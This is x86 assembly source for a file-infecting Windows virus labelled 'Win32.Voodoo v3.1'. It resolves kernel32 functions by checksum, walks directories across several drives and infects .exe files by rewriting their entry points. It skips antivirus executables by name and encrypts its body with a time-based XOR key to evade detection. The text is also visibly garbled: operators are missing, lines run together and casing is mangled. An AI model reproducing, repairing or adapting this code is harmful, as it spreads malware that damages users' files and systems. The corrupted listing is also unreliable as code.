; ============================ Win32.voodoo_v3.1 ================ ===========
; Program: Voodoo v3.1
Description: ParasiTic, Crypt PE Virus
Last Modified: 01.09.1999
; Purpose: Process Handling Under Win32
; Target OS: WIN95 / 98 / NT
NOTES:
Imbase EQU 00400000H
ENTYP EQU 00001000H
AddC EQU IMBASE ENTYP 5
Diskcount EQU 4
FileCount EQU 1
SYSTEM32CRC EQU 04C6D9398H
.386P
.MODEL FLAT
Virsize Equ Offset ViODOO_VER_3_0E - Offset Voodoo_Ver_3_1
Memsize EQU 2300H
EXTRN EXITPROCESS: PROC
INCLUDE WIN32CON.INC; ㄡ ē Consts
.DATA
DB 0
Flag DD 12345678H
Checksum EQU 0B0966F54H
Checksum2 EQU 05E5F512FH
GLOBALLOCCRC EQU 01D2925FEH
GlobalockCrc EQU 0babec79dh
GlobalunlockCrc EQU 09EA2AB80H
GlobalFreeCrc EQU 0B3BDC497H
CreateFileAcrc EQU 0FE222F03H
CreateFilemappingAcrc EQU 0ccf0fbcbh
MapViewoffileCrc EQU 0D3DED3B4H
UnmapViewoffilecrc EQU 0A5ADAF97H
FlushViewoffilecrc EQU 0AFBFBF98H
ReadFilecrc EQU 0e5E1DAC2H
CloseHandlecrc EQU 02731310DH
FindfirstfileAcrc EQU 0315E6238H
FindNextFileAcrc EQU 0C7F4F8CFH
SetFileAttributesAcrc EQU 0ee2112FBH
SetFileTimeCrc EQU 012211900H
GetFilesizeCrc EQU 01E2D17F3H
GetcommandlineAcrc EQU 08CBFBF94H
LSTRCPYACRC EQU 001342E28H
SetFilePointerCrc EQU 065676742H
GetcurrentDirectoryCrc EQU 0E012FECDH
SetCurrentDirectoryCrc EQU 0E012FED9H
GetsystemTimeCrc EQU 018271EF9H
_Globalunlock EQU 0
_GlobalFree EQU _GLOBALUNLOCK 4
_Createfilea EQU _GLOBALFREE 4
_CreateFileMappinga EQU _CREATEFILEA 4
_MapViewOffile EQU _CREATEFILEMAPPINGA 4_UNMAPVIEWOFFILE EQU _MAPVIEWOFFILE 4
_FlushViewoffile EQU _UNMAPVIEWOFFILE 4
_CloseHandle EQU _FLUSHVIEWOFFILE 4
_FindFirstFilea EQU _CloseHandle 4
_FindNextFilea EQU _FINDFIRSTFILEA 4
_SetFileAttributesa EQU _FINDNEXTFILEA 4
_SETFILETIME EQU _SETFILEATTRIBUTESA 4
_Getfilesize EQU _SETFILETIME 4
_GetCommandlinea EQU _GETFILESIZE 4
_Readfile EQU _GETCOMMANDLINEA 4
_LSTRCPYA EQU _READFILE 4
_SetFilePointer EQU _LSTRCPYA 4
_GetcurrentDirectory EQU _SETFILEPOINTER 4
_SetCurrentDirectory EQU _GETCURRENTDIRECTORY 4
_GetsystemTime EQU _SETCURRENTDIRECTORY 4
Oldebp EQU _GETSYSTEMTIME 4
FileSize Equ Oldebp 4
Hhendleoffile EQU FileSize 4
Hhendleofmapfile Equ Hhendleoffile 4
Pointer2MapFile Equ HhendleOfmapFile 4
Tag Equ Pointer2MapFile 4
Searchandle EQU TAG 2
Searchandle2 EQU Searchandle 4
SystemTime EQU Searchandle2 4
Codebuf EQU SystemTime 16
Commandline EQU Codebuf Virsize
Curdir EQU CommandLine 800
Curdir2 EQU Curdir 800
Win32FindData EQU Curdir2 800
CreationTime EQU Win32Finddata 4
Lastaccesstime EQU CREATIONTIME 4
Lastwrittime Equ LastAccesstime 4
FILES EQU LastWritetime 32
NumberofbytesRead Equ Memsize-4
.Code
@Name_pointers_rva equ offset name_pointers_rva - offset entrypoint_
@GetProcaddress Equ Offset getProcaddress - Offset EntryPoint_
@Kernelhandle Equ Offset KernelHandle - Offset EntryPoint_
@_GlobalAlloc Equ Offset _GlobalAlloc - Offset EntryPoint_
@_Globalock Equ Offset _Globalock - Offset Entrypoint_
@MempoInter Equ Offset Mempointer - Offset Entrypoint_
@Nextcode Equ offset Nextcode - Offset EntryPoint_ @ Dirmask Equ Offset Dirmask - Offset EntryPoint_
@Mask Equ Offset Mask - Offset EntryPoint_
@disk Equ Offset Disk - Offset EntryPoint_
@ENTRYPOINTRVA EQU Offset EntryPoinTrva - Offset Entrypoint_
@IMPostTable Equ OffsetTable - Offset EntryPoint_
@ENDIMPORTTABLE EQU Offset EndimportTable - Offset EntryPoint_
VOODOO_VER_3_1:
Call EntryPoint_
EntryPoint_:
Find MZ in Memory
; ----------------------
POPRAVKA EQU Offset Cryptbegin - Offset Voodoo_Ver_3_1
Incax Equ Offset @Incax - Offset Voodoo_Ver_3_1
CRCCode Equ Offset @crccode - Offset Voodoo_Ver_3_1
Mov Al, 00
Call _k
_K: POP ESI
Mov ECX, VIRSIZE - POPRAVKA
Add ESI, Offset CryptBegin- Offset _K; 10H 18 6
MOV EBP, ESP
Crypt: xor byte PTR [ESI], Al
MOV DWORD PTR [EBP 18], 12345678H
CMP DWORD PTR [EBP 18 1], 12345678H
JNE K
JMP VOODOO_VER_3_0E
K: Inc ESI
@Incax: DB 90H, 90H, 90H; Add Ax, CX
Loop Crypt
Cryptbegin:
; ----------------------
Popravka2 Equ Offset CryptBegin2 - Offset Voodoo_Ver_3_1
INCAX2 EQU Offset @ incax2 - Offset Voodoo_Ver_3_1
@Crccode:
Mov Al, 00
Call _k2
_K2: POP ESI
Mov ECX, Virsize - Popravka2
Add ESI, Offset Cryptbegin2- Offset _K2; 10H 18 6
MOV EBP, ESP
Crypt2: XOR BYTE PTR [ESI], Al
MOV DWORD PTR [EBP 18], 12345678H
CMP DWORD PTR [EBP 18 1], 12345678H
JNE K2
JMP VOODOO_VER_3_0E
K2: Inc ESI
@ INCAX2: DB 90H, 90H, 90H; Add Ax, CX
Loop Crypt2
Cryptbegin2:
; ----------------------
Call_ersi
_ °i: POP ESI
POP ECX
Call Scanmz
; in ESI PE HEADER
Add ESI, 80H
Add Edi, DWORD PTR [ESI]; Import RVA
JMP @ L1
Notkernel32:
MOV EBX, EBP
Add Edi, 00014H
@ L1:
CMP DWORD PTR [EDI 0CH], 000000HJE NOTFOUND
Add EBX, DWORD PTR [EDI 0CH]; RVA Name of DLL
Call CRCSUM
CMP Eax, Checksum
JNE NOTKERNEL32
Push EBP
POP ESI
Add ESI, DWORD PTR [EDI 10H]; kernel32 proc
MOV ESI, DWORD PTR [ESI]
CMP Byte PTR [ESI 5], 0E9H; Win98
JNE OK_
Add ESI, DWORD PTR [ESI 6]
OK_: Call Scanmz
; push ebp; hendle of kenel32.dll
Add ESI, 78H
Add Edi, DWORD PTR [ESI]; EDI = EXPORT DIRECTORY TABLE RVA
MOV EAX, EBP
Add Eax, DWORD PTR [EDI 1CH]; Address Table
Push EAX
MOV EDX, EBP
Add Edx, DWORD PTR [EDI 24h]; Ordinal Table
Add EBX, DWORD PTR [EDI 20H]; EBX = Name Pointers RVA
MOV DWORD PTR [ECX @ name_pointers_rva], EBX
MOV ESI, EBX
Push ECX
MOV ECX, DWORD PTR [EDI 18H]; Num of Name Pointers
Push ECX
@ L2: Call ScanNameTable
CMP Eax, Checksum2
Je FoundgetProcadr
Inc ESI
Inc ESI
Inc ESI
Inc ESI
Loop @ L2
FoundgetProcAdr:
POP EAX
Sub eax, ecx; #function
SHL EAX, 1; X2
; Ordinal Table
Add Edx, EAX;
XOR EAX, EAX
MOV AX, Word Ptr [EDX]; Ordinal of getProcaddress
SHL EAX, 2; X4
POP ECX; Entry
POP EBX; Offset To Address Table
Add Ebx, EAX
MOV EAX, DWORD PTR [EBX]
Add Eax, EBP
MOV [@ getProcadDress ECX], EAX
MOV [@ kernelHandle ECX], EBP
Mov Edx, GlobalAlloccrc
Call CalkProcadress
Mov [@ _globalallocc ECX], EAX
Mov Edx, GlobalockCrc
Call CalkProcadress
MOV [@ _globalock ECX], EAX
Push ECX
Push Memsize
PUSH 0
Call dword ptr [@ _globalalloc ECX]
POP ECX
Push ECX
Push EAX
Call dword ptr [@ _globalock ECX]
POP ECX
MOV [@Mempointer ECX], EAX
MOV EBX, EAX
Mov Edi, EAX
Mov ESI, @ ImportTable
Add ESI, ECX
Makeimport:
MOV EDX, DWORD PTR [ESI]
Call CalkProcadress
CLD
Stosd
Inc ESI
Inc ESI
Inc ESI
Inc ESI
CMP Word Ptr [ESI], 6666H
JNE Makeimport
MOV EBP, ECX; Entry!
; ---------------------
; ##########################
Call Infect
; ##########################
MOV ESI, EBP
SUB ESI, 5
Mov Edi, CodeBuf
Add Edi, Ebx; Mempointer
CLD
MOV ECX, Virsize
REP MOVSB
NOTFound:
CMP [Flag], 12345678H
JNE Ret2Prog
PUSH 0
Call EXITPROCESS
Ret2Prog: MOV [Oldebp EBX], EBP
MOV ESI, EBX
MOV EBP, ESI
Add ESI, @ nextcode codebuf 5
Add EBP, Codebuf 5
JMP ESI
NextCode:
Call getcommandlinea
Mov ESI, EAX
CMP BYTE PTR [ESI 1], ':'; for Win9x
JE Normalcommandline
INC EAX
NormalCommandline:
Push EAX
Mov Eax, CommandLine
Add Eax, EBX
Push EAX
Call lstrcpya
Mov ESI, CommandLine
Add ESI, EBX
PUSH ESI
@ L3: Inc ESI
CMP Byte Ptr [ESI], '.'
JNE @ L3
MOV BYTE PTR [ESI 4], 0
POP EAX
Push null
Push file_attribute_archive
Push Open_EXISTING
Push null
Push file_share_read; or file_share_write
Push generic_read; or generic_write
Push EAX
Call Createfilea
MOV [Hhendleoffile EBX], EAX
Push EAX
Push null
Push EAX
Call getFileSize
Mov Edx, EAX
Sub EDX, Virsize
POP EAX
Push EAX
PUSH 0
Push null
Push Edx
Push EAX
Call setfilepointer
POP EAX
Mov EDX, [EBX Oldebp]
Sub EDX, 5
Push Edx
Push null
MOV ECX, NumberofbytesRead
Add ECX, EBX
Push ECX
Push virsize
Push Edx
Push EAX
Call readfile
POP ESI
Call_edi
EntryPoinTrva: DD 0
_EDI: POP EDI
Add ESI, DWORD PTR [EDI]
JMP ESI
; ------------------------------------------------- ---------
Pushwin32Finddata:
Mov Edx, Win32Finddata
Add Edx, EBX
RET
Infectdir:
Mov Eax, Curdir2
Add Eax, EBX
Push Eax;
PUSH 800
Call getCurrentDirectory
Call infect_all_files
Call Pushwin32Finddata
Push Edx
MOV EAX, EBP
Add Eax, @Dirmaskpush EAX
Call FindfirstFilea
Mov DWORD PTR [Searchandle EBX], EAX
L2: Call Pushwin32Finddata
Push Edx
Push DWORD PTR [Searchandle EBX]
Call FindnextFilea
OR EAX, EAX
JZ EXITFROMPROCINFECTDIR
CMP BYTE PTR [Files EBX], '.'
Je L2
MOV EAX, [Win32FindData EBX]
And Eax, File_Attribute_directory
JZ L2
Set New Dir
Mov Edx, Curdir2
Add Edx, EBX
Push Edx
Call setCurrentDirectory
Mov Edx, Files
Add Edx, EBX
; SYSTEM32?
Push EBX
MOV EBX, EDX
Call CRCSUM
POP EBX
CMP EAX, System32Crc
JE L2; DONOTINFECT
Push Edx
Call setCurrentDirectory
Call infect_all_files
JMP L2
EXITFROMPROCINFECTDIR:
RET
; ------------------------------------------------- ---------
INFECT_ALL_FILES:
Call Pushwin32Finddata
Push Edx
Mov Edx, @ Mask
Add Edx, EBP
Push Edx
XOR ECX, ECX
Call FindfirstFilea
Mov DWORD PTR [Searchandle2 EBX], EAX
CMP EAX, -1
JE L2__
Next: or eax, eax
JZ L2__
CMP ECX, FileCount
JGE L2__
Inc ECX
Push ECX
Call infectfile
Call Pushwin32Finddata
Push Edx
Push DWORD PTR [Searchandle2 EBX]
Call FindnextFilea
POP ECX
CMP DI, 9999H
Jne Noerrror
Dec ECX
XOR EDI, EDI
NOERRROR:
JMP next
L2__: RET
; ------------------------------------------------- ------------
Infect:
Mov Eax, Curdir
Add Eax, EBX
Push Eax;
PUSH 800
Call getCurrentDirectory
Call Infectdir
Mov ECX, Diskcount
Scan: PUSH ECX
Mov Eax, @ Disk
Add Eax, EBP
Push EAX
Call setCurrentDirectory
Call Infectdir
Inc Byte PTR [@ Disk EBP]
POP ECX
LOOP SCAN
Mov Eax, Curdir
Add Eax, EBX
Push Eax;
Call setCurrentDirectory
RET
; ------------------------------------------------- ---------
Infectfile:
MOV EAX, EBX
Add Eax, Files
CMP Word PTR [EAX], '- f'; F-port
Je @AV
CMP Word PTR [EAX], 'WA'; AW? JE @AV
CMP Word PTR [EAX], 'Va'; AV ?????
Je @AV
CMP Word PTR [EAX 1], 'Va'; NAV, PAV, RAV, _AVP???
Je @AV
CMP Word PTR [EAX 3], 'Be'; drweb
Je @AV
CMP Word PTR [EAX 2], 'DN'; Panda
Je @AV
CMP DWORD PTR [EAX], 'ITNA'; Anti ???
Je @AV
CMP DWORD PTR [EAX], 'Fasv'; VSAF ???
Je @AV
CMP DWORD PTR [EAX], 'PWSV'; VSWP???
Je @AV
CMP DWORD PTR [EAX], 'VASF'; FSAV ???
Je @AV
Push EAX
Push 00000020H
Push EAX
Call setFileAttributesa
POP EAX
Push null
Push file_attribute_archive
Push Open_EXISTING
Push null
Push file_share_read or file_share_write
Push generic_read or generic_write
Push EAX
Call Createfilea
CMP EAX, -1
JE Error__
Call loadMempoIinter
MOV [Hhendleoffile EBX], EAX
Push EBX
Push null
Push EAX
Call getFileSize
POP EBX
MOV [FileSize EBX], EAX
POINT @ RET: PUSH EDX
Push Eax; To MapViewoffile
Push null
Push EAX
Push null
Push Page_Readwrite
Push null
Push DWORD PTR [HhendleOffile EBX]
Call CreateFilemappinga
MOV [HhendleOfmapFile EBX], EAX
; v steke size
PUSH 0
PUSH 0
Push file_map_write
Push EAX
Call MapViewoffile
MOV [Pointer2MapFile EBX], EAX
POP EDX
CMP Word PTR [Tag EBX], 6666H
JE OKOB
Mov ESI, EAX
CMP BYTE PTR [ESI 18H], 40H
JL OOO
CMP DWORD PTR [ESI 3CH], 00010000H
JG OOO
Mov EDI, DWORD PTR [ESI 3CH]
CMP DWORD PTR [ESI EDI], 00004550H; PE ONLY!
JNE OOO
CMP DWORD PTR [ESI 6FH], 334E4957H; 'Win3' Infected?
Ja OOO
Find code Object
MOV [SystemTime EBX], ESI
;
Add ESI, EDI
MOV Eax, DWORD PTR [ESI 80H]; Import Table RVA
Push EAX
XOR ECX, ECX
MOV CX, Word PTR [ESI 6h]; Num of ObjectMov Edx, DWORD PTR [ESI 28H]; Entry Point RVA
MOV DWORD PTR [EBP @ entrypointrva], edx
Mov EDX, ESI
MOV EAX, 24
Add Ax, Word PTR [ESI 14H]
Mov EDI, ESI
Add Edi, EAX; EDI = Object Table
POP Eax; Import Table RVA
Pusha
Mov Edx, EAX
Find_import_table:
Dec ECX
MOV Eax, DWORD PTR [EDI 0CH]; Object RVA
CMP EDX, EAX
JGE Mabe
INCEDI: Add Edi, 28h
OR ECX, ECX
JE not_find
JMP Find_Import_Table
MABE: Add Eax, DWORD PTR [EDI 10h]; SIZE
CMP EDX, EAX; Object RVA = Jle L22 JMP INCEDI L22: MOV ESI, [Pointer2MapFile EBX] Push Edx Sub EDX, DWORD PTR [EDI 0CH] Add ESI, EDX MOV Eax, DWORD PTR [EDI 14H]; Phis Offset Add ESI, ESI POP EDX; ESI = Phis Offset Import Table MOV ECX, DWORD PTR [EDI 0CH]; Object RVA ECTLI_KERNEL: MOV EDI, DWORD PTR [ESI 0CH]; EDI = Name RVA CMP EDI, NULL; JE KERNEL_HET Sub EDI, ECX Add Edi, Eax; EAX = Phis Offset Add Edi, [Pointer2MapFile EBX] CMP DWORD PTR [EDI], 'NREK'; KERNEL JE KERNEL_ECT Add ESI, 14H JMP ECTLI_KERNEL KERNEL_HET: NOT_FIND: POPA JMP code_not_find KERNEL_ECT: POPA _LOOP: DB 08BH, 47H, 24h; Mov Eax, DWORD [EDI 024H] EXEC_FLAG EQU 20000020H And Eax, Exec_Flag JNZ Code_Object Add Edi, 2ch Loop _Loop JMP code_not_find Code_Object: CHEK Object Size CMP DWORD PTR [EDI 10h], Virsize JL code_not_find PUSH ESI MOV ESI, DWORD PTR [SystemTime EBX] MOV DWORD PTR [ESI 6FH], 334E4957H POP ESI Make Writeble OR DWORD PTR [EDI 24H], 80000000H MOV Eax, DWORD PTR [EDI 0CH]; Object RVA Sub DWORD PTR [EBP @ entrypointrva], EAX MOV DWORD PTR [EDX 28H], EAX; SET New Entry Point RVA; Save Old Programmmm Call Closemapping MOV Word PTR [EBX TAG], 06666H MOV EAX, DWORD PTR [EBX FileSize] Push EAX Add Eax, Virsize JMP Point @ Ret OKOB: MOV Word PTR [EBX TAG], 09999H MOV ESI, DWORD PTR [EDI 14H]; Phisical Offset Add ESI, DWORD PTR [EBX POINTER2MAPFILE] ; Add ESI, EDX POP EDI Add Edi, DWORD PTR [EBX POINTER2MAPFILE] MOV ECX, Virsize Push ESI; CODE PUSH ESI CLD REP MOVSB Write Bady to Program MOV ESI, EBP SUB ESI, 5 POP EDI; CODE MOV ECX, Virsize CLD REP MOVSB MOV EAX, EBX Add Eax, SystemTime Push EAX Call getSystemTime MOV AX, Word PTR [EBX SystemTime 14]] POP ESI MOV BYTE PTR [ESI 6], Al MOV BYTE PTR [ESI CRCCODE 1], AL;? MOV DWORD PTR [ESI Incax], 0e2C10366H; Inc AX MOV DWORD PTR [ESI Incax2], 0e2C10366H; Inc AX PUSH ESI Push EAX Mov ECX, Virsize- Popravka2 Add ESI, Offset CryptBegin2- Offset Voodoo_Ver_3_1; Crypt_2: xor byte PTR [ESI], Al Add Ax, CX Inc ESI LOOP CRYPT_2 POP EAX POP ESI Mov ECX, Virsize- Popravka Add ESI, Offset CryptBegin- Offset Voodoo_Ver_3_1; 2EH 6 Crypt_: xor byte PTR [ESI], Al Add Ax, CX Inc ESI LOOP CRYPT_ CODE_NOT_FIND: OOO2: Call Closemapping ERROR__2: Call Pushwin32Finddata Push DWORD PTR [EDX] MOV EAX, EBX Add Eax, Files Push EAX Call setFileAttributesa @AV: RET OOO: MOV DI, 9999H JMP OOO2 ERROR__: MOV DI, 9999H JMP Error__2 ; ------------------------------------------------- ------- CalkProcadress: Push ECX PUSH ESI Push EDI Mov ESI, @ name_pointers_rva Add ESI, ECX MOV ESI, DWORD PTR [ESI] FCRC: Call ScanNameTable CMP EAX, EDX JE FOCRC Inc ESI Inc ESI Inc ESI Inc ESI JMP FCRC FOCRC: MOV EAX, DWORD PTR [ESI] Add Eax, EBPPUSH EAX Mov Eax, @ kernelhandle Add Eax, ECX Push DWORD PTR [EAX] Call Dword PTR [@ getProcaddress ECX] POP EDI POP ESI POP ECX RET ; ------------------------------------------------- ------- ScanNameTable: Push EBX Push ECX MOV EBX, EBP Add Ebx, DWORD PTR [ESI] Call CRCSUM POP ECX POP EBX RET ; ------------------------------------------------- ------- CRCSUM: XOR EAX, EAX SUM: Add Eax, DWORD PTR [EBX] CMP Byte PTR [EBX 4], 0 JE EXITFROMCRCSUM Inc EBX JMP SUM EXITFROMCRCSUM: RET ; ------------------------------------------------- ------- ScanMz: PUSH ECX; // And Si, 111100000000000000B ScanMz_: SUB ESI, 1000H CMP Word PTR [ESI], 'ZM' JNE scanmz_ Mov EDI, ESI MOV EBX, ESI MOV EBP, ESI PUSH ESI CMP DWORD PTR [ESI 3CH], 00010000H JG nextmz Add ESI, DWORD PTR [ESI 3CH] CMP DWORD PTR [ESI], 004550H Nextmz: POP ESI JNE scanmz_ Add ESI, DWORD PTR [ESI 3CH] POP ECX RET ; --- Local ---------- Closemapping: Push Edx Push DWORD PTR [Pointer2MapFile EBX] Call unmapviewoffile Push DWORD PTR [HhendleOfmapFile EBX] Call Closehandle POP EDX RET ; ------------------------------------------------- ------- LoadMempoInter: MOV EBX, DWORD PTR DS: [EBP @MEMPOINTER] RET ; ---- IMPORT --------- GetFileSize: Call LoadMempointer JMP DWORD PTR DS: [EBX _GETFILESIZE] CreateFilea: Call LoadMempointer JMP DWORD PTR DS: [EBX _CREATEFILEA] CreateFilemappingA: Call loadMempoIinter JMP DWORD PTR DS: [EBX _CREATEFILEMAPPINGA] MapViewOffile: Call loadMempoIinter JMP DWORD PTR DS: [EBX _MAPVIEWOFFILE] UnmapViewoffile: Call loadMempoIinter JMP DWORD PTR DS: [EBX _UNMAPVIEWOFFILE] FlushViewoffile: Call loadMempoIinter JMP DWORD PTR DS: [EBX _FLUSHVIEWOFFILE] CloseHandle: Call LoadMempointer JMP DWORD PTR DS: [EBX _CLOSEHANDLE] Getcommandlinea: Call loadMempoIinter JMP DWORD PTR DS: [EBX _GetCommandlinea] LSTRCPYA: CALL LOADMEMPOINTER JMP DWORD PTR DS: [EBX _LSTRCPYA] Readfile: Call LoadMempointer JMP DWORD PTR DS: [EBX _READFILE] SetFilePointer: Call LoadMempointer JMP DWORD PTR DS: [EBX _SETFILEPOINTER] FindfirstFilea: Call LoadMempoInter JMP DWORD PTR DS: [EBX _FINDFIRSTFILEA] FINDNEXTFILEA: CALL LOADMEMPOINTER JMP DWORD PTR DS: [EBX _FINDNEXTFILEA] GetCurrentDirectory: Call loadMempoIinter JMP DWORD PTR DS: [EBX _GetcurrentDirectory] SetCurrentDirectory: Call loadMempoIinter JMP DWORD PTR DS: [EBX _SETCURRENTDIRECTORY] SetFileAttributesa: Call loadMempoIinter JMP DWORD PTR DS: [EBX _SETFILEATTRIBUTESA] SETFILETIME: Call loadMempoIinter JMP DWORD PTR DS: [EBX _SETFILETIME] GetSystemTime: Call loadMempoIinter JMP DWORD PTR DS: [EBX _GETSYSTEMTIME] DB '(c) VOODOO / SMF V3.1 07.08.1999' ; ------------------- GetProcaddress DD 11223344H KernelHandle DD 11223344H Name_Pointers_RVA DD 11223344H _GlobalAlloc DD 11223344H _Globalock DD 11223344H Mempointer DD 11223344H Disk DB 'C: /', 0 Dirmask DB '*. *', 0 Mask DB '* .exe', 0 Importcount Equ (Offset EndimportTable- Offset ImportTable) / 4 ImportTable: DD GlobalUnlockCrc DD GlobalFreeCrc DD CREATEFILEACRC DD CreateFilemappingAcrc DD MapViewOffileCrc DD unmapViewoffileCRC DD flushviewoffilecrc DD CloseHandleCrc DD FindfirstFileAcrc DD FINDNEXTFILEACRC DD setFileAttributesAcrc DD setFileTimeCrc DD getFileSizeCrc DD getcommandlineAcrc DD ReadFileCRC DD LSTRCPYACRC DD setfilepointercrcdd getcurrentdirectoryCRC DD setCurrentDirectoryCRC DD GetSystemTimeCrc DW 6666H EndimportTable: VOODOO_VER_3_0E: ENDS End voodoo_ver_3_1 ===== CUT =====
